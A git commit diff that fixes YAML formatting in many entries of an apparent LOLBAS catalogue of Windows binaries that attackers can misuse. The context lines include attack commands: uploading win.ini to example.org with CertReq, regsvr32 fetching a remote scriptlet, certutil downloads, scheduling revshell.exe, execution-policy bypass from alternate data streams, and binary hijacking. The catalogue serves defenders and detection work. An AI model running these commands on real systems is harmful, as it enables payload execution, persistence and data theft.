mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Merge pull request #122 from wietze/fixing-yaml-issues
Fixing yaml issues
This commit is contained in:
commit
19a8d5ac08
@ -2,7 +2,7 @@
|
|||||||
Name: Binary.exe
|
Name: Binary.exe
|
||||||
Description: Something general about the binary
|
Description: Something general about the binary
|
||||||
Author: The person that created this file
|
Author: The person that created this file
|
||||||
Created: Date the person created this file
|
Created: Date the person created this file (use YYYY-MM-DD without quotes)
|
||||||
Commands:
|
Commands:
|
||||||
- Command: The command
|
- Command: The command
|
||||||
Description: Description of the command
|
Description: Description of the command
|
||||||
@ -34,7 +34,7 @@ Resources:
|
|||||||
- Link: Threatintelreport...
|
- Link: Threatintelreport...
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: John Doe
|
- Person: John Doe
|
||||||
Handle: @johndoe
|
Handle: '@johndoe'
|
||||||
- Person: Ola Norman
|
- Person: Ola Norman
|
||||||
Handle: @olaNor
|
Handle: '@olaNor'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Explorer.exe
|
Name: Explorer.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: explorer.exe calc.exe
|
- Command: explorer.exe calc.exe
|
||||||
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
|
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
|
||||||
@ -14,5 +13,7 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/986984122563391488
|
- https://twitter.com/bohops/status/986984122563391488
|
||||||
Notes: Thanks to Jimmy - @bohops
|
Acknowledgement:
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Netsh.exe
|
Name: Netsh.exe
|
||||||
Description: Execute, Surveillance
|
Description: Execute, Surveillance
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: |
|
- Command: |
|
||||||
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
|
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
|
||||||
@ -22,5 +21,3 @@ Resources:
|
|||||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||||
- https://attack.mitre.org/wiki/Technique/T1128
|
- https://attack.mitre.org/wiki/Technique/T1128
|
||||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||||
Notes: ''
|
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nltest.exe
|
Name: Nltest.exe
|
||||||
Description: Credentials
|
Description: Credentials
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||||
Description: ''
|
Description: ''
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/sysopfb/status/986799053668139009
|
- https://twitter.com/sysopfb/status/986799053668139009
|
||||||
- https://ss64.com/nt/nltest.html
|
- https://ss64.com/nt/nltest.html
|
||||||
Notes: Thanks to Sysopfb - @sysopfb
|
Acknowledgement:
|
||||||
|
- Person: Sysopfb
|
||||||
|
Handle: '@sysopfb'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Openwith.exe
|
Name: Openwith.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: OpenWith.exe /c C:\test.hta
|
- Command: OpenWith.exe /c C:\test.hta
|
||||||
Description: Opens the target file with the default application.
|
Description: Opens the target file with the default application.
|
||||||
@ -16,5 +15,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/harr0ey/status/991670870384021504
|
- https://twitter.com/harr0ey/status/991670870384021504
|
||||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
Acknowledgement:
|
||||||
|
- Person: Matt harr0ey
|
||||||
|
Handle: '@harr0ey'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Powershell.exe
|
Name: Powershell.exe
|
||||||
Description: Execute, Read ADS
|
Description: Execute, Read ADS
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||||
@ -14,5 +13,7 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
Acknowledgement:
|
||||||
|
- Person: Moriarty
|
||||||
|
Handle: '@Moriarty_Meng'
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Psr.exe
|
Name: Psr.exe
|
||||||
Description: Surveillance
|
Description: Surveillance
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
|
- Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
|
||||||
Description: Capture screenshots of the desktop and save them in the target .ZIP file.
|
Description: Capture screenshots of the desktop and save them in the target .ZIP file.
|
||||||
@ -18,5 +17,4 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||||
Notes: 'Thanks to '
|
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Robocopy.exe
|
Name: Robocopy.exe
|
||||||
Description: Copy
|
Description: Copy
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||||
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
||||||
@ -16,5 +15,3 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||||
Notes: Thanks to Name of guy - @twitterhandle
|
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: AcroRd32.exe
|
Name: AcroRd32.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997997818362155008
|
- https://twitter.com/pabraeken/status/997997818362155008
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Gpup.exe
|
Name: Gpup.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997892519827558400
|
- https://twitter.com/pabraeken/status/997892519827558400
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nlnotes.exe
|
Name: Nlnotes.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
Acknowledgement:
|
||||||
|
- Person: Daniel Bohannon
|
||||||
|
Handle: '@danielhbohannon'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Notes.exe
|
Name: Notes.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
Acknowledgement:
|
||||||
|
- Person: Daniel Bohannon
|
||||||
|
Handle: '@danielhbohannon'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nvudisp.exe
|
Name: Nvudisp.exe
|
||||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Nvudisp.exe System calc.exe
|
- Command: Nvudisp.exe System calc.exe
|
||||||
Description: Execute calc.exe as a subprocess.
|
Description: Execute calc.exe as a subprocess.
|
||||||
@ -23,4 +22,7 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nvuhda6.exe
|
Name: Nvuhda6.exe
|
||||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: nvuhda6.exe System calc.exe
|
- Command: nvuhda6.exe System calc.exe
|
||||||
Description: Execute calc.exe as a subprocess.
|
Description: Execute calc.exe as a subprocess.
|
||||||
@ -23,4 +22,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||||
Notes: Thanks to Adam - @hexacorn
|
Acknowledgement:
|
||||||
|
- Person: Adam
|
||||||
|
Handle: '@hexacorn'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: ROCCAT_Swarm.exe
|
Name: ROCCAT_Swarm.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994213164484001793
|
- https://twitter.com/pabraeken/status/994213164484001793
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -23,5 +23,5 @@ Resources:
|
|||||||
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Bart
|
- Person: Bart
|
||||||
Handle: @bartblaze
|
Handle: '@bartblaze'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Setup.exe
|
Name: Setup.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Run Setup.exe
|
- Command: Run Setup.exe
|
||||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994381620588236800
|
- https://twitter.com/pabraeken/status/994381620588236800
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Usbinst.exe
|
Name: Usbinst.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993514357807108096
|
- https://twitter.com/pabraeken/status/993514357807108096
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: VBoxDrvInst.exe
|
Name: VBoxDrvInst.exe
|
||||||
Description: Persistence
|
Description: Persistence
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993497996179492864
|
- https://twitter.com/pabraeken/status/993497996179492864
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
Name: aswrundll.exe
|
Name: aswrundll.exe
|
||||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||||
Author: Eli Salem
|
Author: Eli Salem
|
||||||
Created: 19\03\2019
|
Created: 2019-03-19
|
||||||
Commands:
|
Commands:
|
||||||
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
|
- Command: "\"C:\\Program Files\\Avast Software\\Avast\\aswrundll\" \"C:\\Users\\Public\\Libraries\\tempsys\\module.dll\""
|
||||||
Description: Load and execute modules using aswrundll
|
Description: Load and execute modules using aswrundll
|
||||||
Usecase: Execute malicious modules using aswrundll.exe
|
Usecase: Execute malicious modules using aswrundll.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -11,10 +11,8 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Avast Software\Avast\aswrundll
|
- Path: C:\Program Files\Avast Software\Avast\aswrundll
|
||||||
Code_Sample:
|
|
||||||
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
|
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eli Salem
|
- Person: Eli Salem
|
||||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
Handle: https://www.linkedin.com/in/eli-salem-954728150
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: winword.exe
|
Name: winword.exe
|
||||||
Description: Document editor included with Microsoft Office.
|
Description: Document editor included with Microsoft Office.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: winword.exe /l dllfile.dll
|
- Command: winword.exe /l dllfile.dll
|
||||||
Description: Launch DLL payload.
|
Description: Launch DLL payload.
|
||||||
@ -10,7 +10,7 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||||
|
@ -2,18 +2,18 @@
|
|||||||
Name: testxlst.js
|
Name: testxlst.js
|
||||||
Description: Script included with Pywin32.
|
Description: Script included with Pywin32.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Categories: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Categories: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
@ -25,4 +25,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/993314069116485632
|
- https://twitter.com/bohops/status/993314069116485632
|
||||||
- https://github.com/mhammond/pywin32
|
- https://github.com/mhammond/pywin32
|
||||||
Notes: Thanks to Jimmy - @bohops
|
Acknowledgement:
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: At.exe
|
Name: At.exe
|
||||||
Description: Schedule periodic tasks
|
Description: Schedule periodic tasks
|
||||||
Author: 'Freddie Barr-Smith'
|
Author: 'Freddie Barr-Smith'
|
||||||
Created: '2019-09-20'
|
Created: 2019-09-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||||
Description: Create a recurring task to execute every day at a specific time.
|
Description: Create a recurring task to execute every day at a specific time.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Atbroker.exe
|
Name: Atbroker.exe
|
||||||
Description: Helper binary for Assistive Technology (AT)
|
Description: Helper binary for Assistive Technology (AT)
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ATBroker.exe /start malware
|
- Command: ATBroker.exe /start malware
|
||||||
Description: Start a registered Assistive Technology (AT).
|
Description: Start a registered Assistive Technology (AT).
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Bash.exe
|
Name: Bash.exe
|
||||||
Description: File used by Windows subsystem for Linux
|
Description: File used by Windows subsystem for Linux
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Bitsadmin.exe
|
Name: Bitsadmin.exe
|
||||||
Description: Used for managing background intelligent transfer
|
Description: Used for managing background intelligent transfer
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: CertReq.exe
|
Name: CertReq.exe
|
||||||
Description: Used for requesting and managing certificates
|
Description: Used for requesting and managing certificates
|
||||||
Author: 'David Middlehurst'
|
Author: 'David Middlehurst'
|
||||||
Created: '2020-07-07'
|
Created: 2020-07-07
|
||||||
Commands:
|
Commands:
|
||||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Certutil.exe
|
Name: Certutil.exe
|
||||||
Description: Windows binary used for handling certificates
|
Description: Windows binary used for handling certificates
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||||
Description: Download and save 7zip to disk in the current folder.
|
Description: Download and save 7zip to disk in the current folder.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Cmd.exe
|
Name: Cmd.exe
|
||||||
Description: The command-line interpreter in Windows
|
Description: The command-line interpreter in Windows
|
||||||
Author: 'Ye Yint Min Thu Htut'
|
Author: 'Ye Yint Min Thu Htut'
|
||||||
Created: '2019-06-26'
|
Created: 2019-06-26
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
